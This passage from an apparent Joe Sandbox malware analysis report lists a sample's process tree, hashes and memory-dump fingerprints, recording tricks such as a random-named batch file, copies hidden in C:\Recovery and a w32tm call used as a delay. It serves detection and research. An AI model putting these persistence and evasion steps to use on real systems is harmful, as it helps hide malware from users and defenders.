                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:66
                                                    Start time:06:52:36
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:67
                                                    Start time:06:52:36
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:68
                                                    Start time:06:52:36
                                                    Start date:14/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    Imagebase:0x660000
                                                    File size:1'920'000 bytes
                                                    MD5 hash:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:69
                                                    Start time:06:52:37
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat"
                                                    Imagebase:0x7ff65bf80000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:70
                                                    Start time:06:52:37
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:71
                                                    Start time:06:52:38
                                                    Start date:14/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    Imagebase:0xec0000
                                                    File size:1'920'000 bytes
                                                    MD5 hash:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:75
                                                    Start time:06:52:40
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff6a4090000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:77
                                                    Start time:06:52:40
                                                    Start date:14/09/2024
                                                    Path:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    Imagebase:0xcd0000
                                                    File size:1'920'000 bytes
                                                    MD5 hash:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 58%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:78
                                                    Start time:06:52:40
                                                    Start date:14/09/2024
                                                    Path:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    Imagebase:0x760000
                                                    File size:1'920'000 bytes
                                                    MD5 hash:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:79
                                                    Start time:06:52:51
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff65fd50000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:80
                                                    Start time:06:52:56
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff693ab0000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:81
                                                    Start time:06:52:59
                                                    Start date:14/09/2024
                                                    Path:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
                                                    Imagebase:0xdd0000
                                                    File size:1'920'000 bytes
                                                    MD5 hash:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Reset < >
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \
                                                      • API String ID: 0-2967466578
                                                      • Opcode ID: 6ada7c2471dbeb01bf3cd8fab526a51c99996781f4c518a4f8858c80c9d38870
                                                      • Instruction ID: 20e40b67a1b154b6c5cd602acd6b29bb3668e9d8328eecd0cd0ad9febd30db3e
                                                      • Opcode Fuzzy Hash: 6ada7c2471dbeb01bf3cd8fab526a51c99996781f4c518a4f8858c80c9d38870
                                                      • Instruction Fuzzy Hash: C2424630B0EA494FE768EB6884A567977D1EF89300F15817ED48FC32E7DD28B8428741
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4L_^
                                                      • API String ID: 0-2524838182
                                                      • Opcode ID: eabac2ad6dcd441c1fa76420fe3f4416764ecb7dd16bd3223a8f947abd65b795
                                                      • Instruction ID: fefefb4dea55ee1d9688087f3dbc4768b223ce4215c8295d5ed2e7794f2f4e2b
                                                      • Opcode Fuzzy Hash: eabac2ad6dcd441c1fa76420fe3f4416764ecb7dd16bd3223a8f947abd65b795
                                                      • Instruction Fuzzy Hash: 86C13932E0D6984FD715EB6CA8A54ED7BF0EF55714B0541BBE0CAC71A3DD14A805C781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4L_^
                                                      • API String ID: 0-2524838182
                                                      • Opcode ID: 573c8a3b7aaca9d5769e3f050cfb2d4816b8505d6d3bcc39e6ef57e17ed1f407
                                                      • Instruction ID: 72cda0bb0cb35f6700190d16012d7f79eeea2b559a0e6ad45bffd5fc0c645d6f
                                                      • Opcode Fuzzy Hash: 573c8a3b7aaca9d5769e3f050cfb2d4816b8505d6d3bcc39e6ef57e17ed1f407
                                                      • Instruction Fuzzy Hash: 7EC13932B0D6984FD719EBACA8A54ED7BF0EF59714B0541BBE0CAC71A3DD14A805C782
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43347d27136a7a83e22a28aba8f421bac094657f55a3a69debc0336c88bb46ca
                                                      • Instruction ID: 586ed66359eb26b9ccf816cc9c1a4253740b299d8c6e9d5562535ab531e725c1
                                                      • Opcode Fuzzy Hash: 43347d27136a7a83e22a28aba8f421bac094657f55a3a69debc0336c88bb46ca
                                                      • Instruction Fuzzy Hash: B8628130B1AA4D9FDB98EF5CC865AA937E2FF6C354F0101B9E44DD72A1DA28EC418741
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c079b65a8a560af85362e77b15d157b9aa7e666bf4342362ec678689cdcd2844
                                                      • Instruction ID: 2910e916a831e9dfb616b7d705e50d128dc86059e65e545116229f7e00990f61
                                                      • Opcode Fuzzy Hash: c079b65a8a560af85362e77b15d157b9aa7e666bf4342362ec678689cdcd2844
                                                      • Instruction Fuzzy Hash: 1722253161DB8A8FD369CF2880546E5BBD1FFA9340F0586BED4CA872A2DE34E545CB41
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b420122cf3e4ea680e291511d0ab464f063c33a9d7c84599b2e59dd9ab0b45e1
                                                      • Instruction ID: 8e2218a4f96fe70067b53b61604acb7981af064088b10d8a0d859bbdcf7194fa
                                                      • Opcode Fuzzy Hash: b420122cf3e4ea680e291511d0ab464f063c33a9d7c84599b2e59dd9ab0b45e1
                                                      • Instruction Fuzzy Hash: 3A025C31B0DA494FD769EB2894646FA7BE1EF95310F0582BAD0CDC71E3DE28A845C781
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 589c2e1898d391f75149e57ad9487f26e75d58d34f46d3f5e59d02897ed61420
                                                      • Instruction ID: 514dc4aff044a9e4cdb07d557278fa2ab6cc9b6db25f2b2345d47b2930748776
                                                      • Opcode Fuzzy Hash: 589c2e1898d391f75149e57ad9487f26e75d58d34f46d3f5e59d02897ed61420
                                                      • Instruction Fuzzy Hash: F8C18231B1994D8FDF94EF6CC495AEA3BE1EF6D390B05017AE44DC72A2DA24E9418780
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: uL_H$zL_H
                                                      • API String ID: 0-419324264
                                                      • Opcode ID: 3261d105cd10202075e189c55d49f23464d3041532536e719483e128a7e543a7
                                                      • Instruction ID: 9216a610bb46034fcff0bb0a9644f468fb0aec721d5cc65c6b02740a0beab81e
                                                      • Opcode Fuzzy Hash: 3261d105cd10202075e189c55d49f23464d3041532536e719483e128a7e543a7
                                                      • Instruction Fuzzy Hash: 2312D471B0DA4D4FEB94EF6C88756A93BE2EF98340B1541B9D04DC72B6DE24AC42C784
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PL_^$QL_^
                                                      • API String ID: 0-2263931500
                                                      • Opcode ID: 8afbcc3ec08469a87b729538aedd05fe57c6b4d799ab616283bbebedfe906c00
                                                      • Instruction ID: f80dca19a6336bbecbd5bd33eb6714ce1a2c1ce3cf5f56923c8cbba12b35796c
                                                      • Opcode Fuzzy Hash: 8afbcc3ec08469a87b729538aedd05fe57c6b4d799ab616283bbebedfe906c00
                                                      • Instruction Fuzzy Hash: 62B1171BF0D2A60AD315F7ACB4B68ED3B60DFC123E71982F7D09D890D7DC1864864295
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?R_H$H
                                                      • API String ID: 0-1647666168
                                                      • Opcode ID: 6ca5e2dea2803b489056b01eb5fcc26960ed3e6271c326d47fb6eac2005e2155
                                                      • Instruction ID: bf9f7dc2481b91f0e35b22b0473b8da10b2b3497cf771cf38771ea9dd93ad0e7
                                                      • Opcode Fuzzy Hash: 6ca5e2dea2803b489056b01eb5fcc26960ed3e6271c326d47fb6eac2005e2155
                                                      • Instruction Fuzzy Hash: 5A71BB71709D0E0FEBA4EB5C94657F933D1EF99360B0601BAE44DC72A6DE19AD428381
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [`$[a
                                                      • API String ID: 0-1202865014
                                                      • Opcode ID: 0e695f48964b889c9bbb6a6a6e3879d17f2619c8da730f97be1ee124eb970246
                                                      • Instruction ID: ab9dacd74a7b1f9eabd2151f0bafbcd8969919b53193edbfd6868195c68b1b67
                                                      • Opcode Fuzzy Hash: 0e695f48964b889c9bbb6a6a6e3879d17f2619c8da730f97be1ee124eb970246
                                                      • Instruction Fuzzy Hash: 3141A621B1AE5E0FDBB9AA6C44746793AD1EF99600B4502BAD40DC32B6DD19FD01C3C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [`$[a
                                                      • API String ID: 0-1202865014
                                                      • Opcode ID: a4dd6f5ea4dce4c986b6675e5c94252e914ddba0dfd113693fb451fa02c87fa7
                                                      • Instruction ID: 76de786771c70eba648bd007b84670e4fa2f3d4f6d082f5955ef7407c67d93db
                                                      • Opcode Fuzzy Hash: a4dd6f5ea4dce4c986b6675e5c94252e914ddba0dfd113693fb451fa02c87fa7
                                                      • Instruction Fuzzy Hash: 19219120B1AF4E0FD7A9AB6C48746783BD1EF59614B4101BAD40CC32B7DD19AD41C3C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4L_^$6L_^
                                                      • API String ID: 0-563004798
                                                      • Opcode ID: fddfd66d83d5e4ffe0f8ce70bf627c4b58dc6c835e3928a38f9152b10a05a7e4
                                                      • Instruction ID: 0033c0e928045d2a91f761ed0c6d7260ed0c04004cb2d03b334a11e284789ac6
                                                      • Opcode Fuzzy Hash: fddfd66d83d5e4ffe0f8ce70bf627c4b58dc6c835e3928a38f9152b10a05a7e4
                                                      • Instruction Fuzzy Hash: 9901221BB084A607E720B6EDBC364FE7310DF8137B32A81B3C699864839C08744646E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O8^L
                                                      • API String ID: 0-2467913278
                                                      • Opcode ID: 6aef020cd67d1106722abe6053f698b7825bb08584d41f9941771461b02c743d
                                                      • Instruction ID: 6218fd1b8238d2661e760ce1d528d5ee6b16f4d6f060ceeb0efdd5ccac1e280c
                                                      • Opcode Fuzzy Hash: 6aef020cd67d1106722abe6053f698b7825bb08584d41f9941771461b02c743d
                                                      • Instruction Fuzzy Hash: C322F320B0EA4A4FE759EBA844256B97BD1EF45310F5501BED00ECB2F3DD1CAD828786
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 6c327ff42152186c2e30494562fdb0cc56f5d7580a5244c4d3db590948bdd7fe
                                                      • Instruction ID: a01c8c96537f7d3073f0d50547a61e74a3d6e95b025c0e4690d81b100a36b77e
                                                      • Opcode Fuzzy Hash: 6c327ff42152186c2e30494562fdb0cc56f5d7580a5244c4d3db590948bdd7fe
                                                      • Instruction Fuzzy Hash: 1DD14230B1EB494FD328EB58D4A05B5B3E0FF99304B1546BED08A872A6CE35F8428781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: d6d8669ca51529a97151473819fdfad43a7591b24f3f3ba42ccdf0e263547980
                                                      • Instruction ID: cec1c296502a58942e78707cb06d7fdf5fa0f4d1aac804baa6cd6a7d9f4f4f25
                                                      • Opcode Fuzzy Hash: d6d8669ca51529a97151473819fdfad43a7591b24f3f3ba42ccdf0e263547980
                                                      • Instruction Fuzzy Hash: 5DC15630B1EB4A4FD769DB5C8460575B7E1FF9A300B1545BED08AC72A2CE35F9428781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 5dea0fba227293aef2d472a9b22189f9d91f8efa5958d56ac71e9f5f999cceb6
                                                      • Instruction ID: 3ed6d00b31ef0fac8fbe085c3eb8e9ded8ed313aa4d0342b92d5a76a60034b27
                                                      • Opcode Fuzzy Hash: 5dea0fba227293aef2d472a9b22189f9d91f8efa5958d56ac71e9f5f999cceb6
                                                      • Instruction Fuzzy Hash: 05C12231B0DB494FD729EB5CD4918B9B3E1FF98354B1446BED08A871A6CA31F8438B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 3337ba7bdc03864627ce70b9d61acea30c2c43abeef89b27ef4db64bcd2f6bdc
                                                      • Instruction ID: 79b5146cb6549a20de321f5d62024684cd404e7b53e7b84ce714cac4bdf2678e
                                                      • Opcode Fuzzy Hash: 3337ba7bdc03864627ce70b9d61acea30c2c43abeef89b27ef4db64bcd2f6bdc
                                                      • Instruction Fuzzy Hash: 9AC11F30B1DB498FE728DB5CD491935BBE1FF98300B1546BDD08AC32A6DA35F9428B85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 40b1f6ecb4d3440836523b1475dd3eaadd97cdf115372d8496318d6aa39d2067
                                                      • Instruction ID: 09356f7dfdacf0960346a84aa58d6febc7c5407d31d711b545c4e530fbf806bd
                                                      • Opcode Fuzzy Hash: 40b1f6ecb4d3440836523b1475dd3eaadd97cdf115372d8496318d6aa39d2067
                                                      • Instruction Fuzzy Hash: 6CB14530B1DB4A4FD769DB5C8460975BBE1FF94300B1606BED08AC72B6DA35F9028785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: f5294f09667a7d5ddc4eeb7c2bc90ca33c01e561c96d1ddabb95b2b475e54a8f
                                                      • Instruction ID: 2d24e98a15bbc0316e02bd9afc3405d4ef13059e8cef0fc65f8c7acbb575d4c1
                                                      • Opcode Fuzzy Hash: f5294f09667a7d5ddc4eeb7c2bc90ca33c01e561c96d1ddabb95b2b475e54a8f
                                                      • Instruction Fuzzy Hash: FDB14231B1AB494FD368EB4C94A05B5B3E1FF98304B1546BED08EC72A2CE35F8428780
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 9006ea8a7b519c522e9dd0e8b657c84c83c48fcb4796d120cb4166bca811868e
                                                      • Instruction ID: bc9ef74a659d036f496001308bf509c9390913c0d39765dc312f39137899e9f1
                                                      • Opcode Fuzzy Hash: 9006ea8a7b519c522e9dd0e8b657c84c83c48fcb4796d120cb4166bca811868e
                                                      • Instruction Fuzzy Hash: 87A10030B1EB494FD768EB4894605B5B3E1FF99304B1546BED09AC32A6DE35F8428B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: zL_H
                                                      • API String ID: 0-425878393
                                                      • Opcode ID: 9b13d66e252d51eb6b71ee93e9aeb26c4783835bfe7ebaacd64a8b48dc28a86f
                                                      • Instruction ID: 52e5b2b3225fac11745fe482605afb5e04871fcbf47b941d5e4caeacd0b4cdfd
                                                      • Opcode Fuzzy Hash: 9b13d66e252d51eb6b71ee93e9aeb26c4783835bfe7ebaacd64a8b48dc28a86f
                                                      • Instruction Fuzzy Hash: 2FB1E720B0EB8D5FD7A5DBB884247A9BFE1EF45310F1505BAC04ACB1B2CA6D5D86C781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 3a55ff386329cc0663e49af2f6e404c3e00bd2de7834520884bacd6bdcfecd70
                                                      • Instruction ID: 33578816aa8e38e385ef1854017b4ffc804b3d92d1bd4efbbf14d0dd9a77ca87
                                                      • Opcode Fuzzy Hash: 3a55ff386329cc0663e49af2f6e404c3e00bd2de7834520884bacd6bdcfecd70
                                                      • Instruction Fuzzy Hash: 3391F030B1AB4A4FD778DB48D450975B3E1FFA9300B154A7ED09AC32A6DE35F9428B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [A
                                                      • API String ID: 0-3164954885
                                                      • Opcode ID: fef009381453c414c9b08c1ddd8a804f46fed13b536923edd82db63dc98a1f77
                                                      • Instruction ID: 668e1b4a2e58ccab1493a80f436fc11c89e96f190e323fc4339a58fbb138e091
                                                      • Opcode Fuzzy Hash: fef009381453c414c9b08c1ddd8a804f46fed13b536923edd82db63dc98a1f77
                                                      • Instruction Fuzzy Hash: 26814F3170EA4E0FE7A9ABACA8A55F577D1EF4936070601BFD48EC71A3DD19AC428350
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: kL_H
                                                      • API String ID: 0-4056372099
                                                      • Opcode ID: 89a8ab63d2d9cbb41487d9cd8da01b5406e13ddf5d9c41bd192c96e5026b09ed
                                                      • Instruction ID: 0f4c5985e6bbb7fd90da613c5c4d337ca3600fdfed9156ec60902618486b2dd1
                                                      • Opcode Fuzzy Hash: 89a8ab63d2d9cbb41487d9cd8da01b5406e13ddf5d9c41bd192c96e5026b09ed
                                                      • Instruction Fuzzy Hash: 27711722B1EE4E0FE7A8DB6C94656F57BD1EF9831070502B6D05EC72F6ED18AD424384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
